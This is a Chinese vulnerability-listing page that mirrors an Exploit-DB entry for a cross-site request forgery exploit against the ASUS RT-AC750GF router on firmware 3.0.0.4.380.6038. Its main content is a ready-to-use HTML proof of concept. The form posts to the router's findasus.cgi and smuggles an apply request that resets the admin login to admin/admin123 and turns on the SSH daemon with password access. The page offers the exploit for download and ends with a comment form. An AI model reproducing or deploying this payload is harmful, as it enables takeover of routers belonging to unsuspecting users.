漏洞概要

漏洞标题:
AsusWRT RT-AC750GF – Cross-Site Request Forgery (Change Admin Password)

提交时间:
2018-06-25

危害等级:

相关厂商:

漏洞分类:
exp公布

关注度:
共 18 人关注

漏洞详情

EDB-ID: 44937 Author: Wadeek Published: 2018-06-25
CVE: N/A Type: Webapps Platform: Hardware
Aliases:
N/A
Advisory/Source: N/A Tags:
Cross-Site Request Forgery (CSRF)

E-DB Verified:
<a href="javascript:void(0);" data-trigger="focus" data-toggle="popover" data-placement="top" data-content='We make an effort to verify exploits (verifty) in our labs, when possible. A “non verified” exploit (marked by a clock icon clock) simply means we did not have the opportunity to test the exploit internally.’>
Waiting verification

Exploit:

Download Exploit Code Download

/

View Raw

Vulnerable App:
N/A
# Exploit Title: AsusWRT RT-AC750GF - Cross-Site Request Forgery (Change Admin Password)
# Date: 2018-06-23
# Exploit Author: Wadeek
# Vendor Homepage: https://www.asus.com/
# Firmware Link: http://dlcdnet.asus.com/pub/ASUS/wireless/RT-AC750GF/FW_RT_AC750GF_30043806038.zip
# Firmware Version: 3.0.0.4.380.6038
# Tested on: ASUS RT-AC750GF with default firmware version 3.0.0.4.380.6038

# (Cross Site Scripting -> URL Redirecting -> Cross-Site Request Forgery {Cookie: asus_token}
# -> Change the router login password and enable SSH daemon)

<html>
<body>
<p>Proof Of Concept</p>
<!-- <form action="http://192.168.1.1/findasus.cgi" method="POST"> -->
<form action="http://router.asus.com/findasus.cgi" method="POST">
<input type="hidden" name="action_mode" value="refresh_networkmap" />
<input type="text" id="current_page" name="current_page" value="" />
<script>
// set username at admin
// set password at admin123
// enable ssh daemon
document.getElementById("current_page").value = "start_apply.htm?productid=RT-AC53&current_page=Advanced_System_Content.asp&next_page=Advanced_System_Content.asp&modified=0&action_mode=apply&action_wait=5&action_script=restart_time%3Brestart_upnp&http_username=admin&http_passwd=admin123&http_passwd2=admin123&v_password2=admin123&sshd_enable=1&sshd_port=22&sshd_pass=1&sshd_authkeys=";
</script>
<input type="submit" value="" />
</form>
</body>
</html>

发表评论

电子邮件地址不会被公开。 必填项已用*标注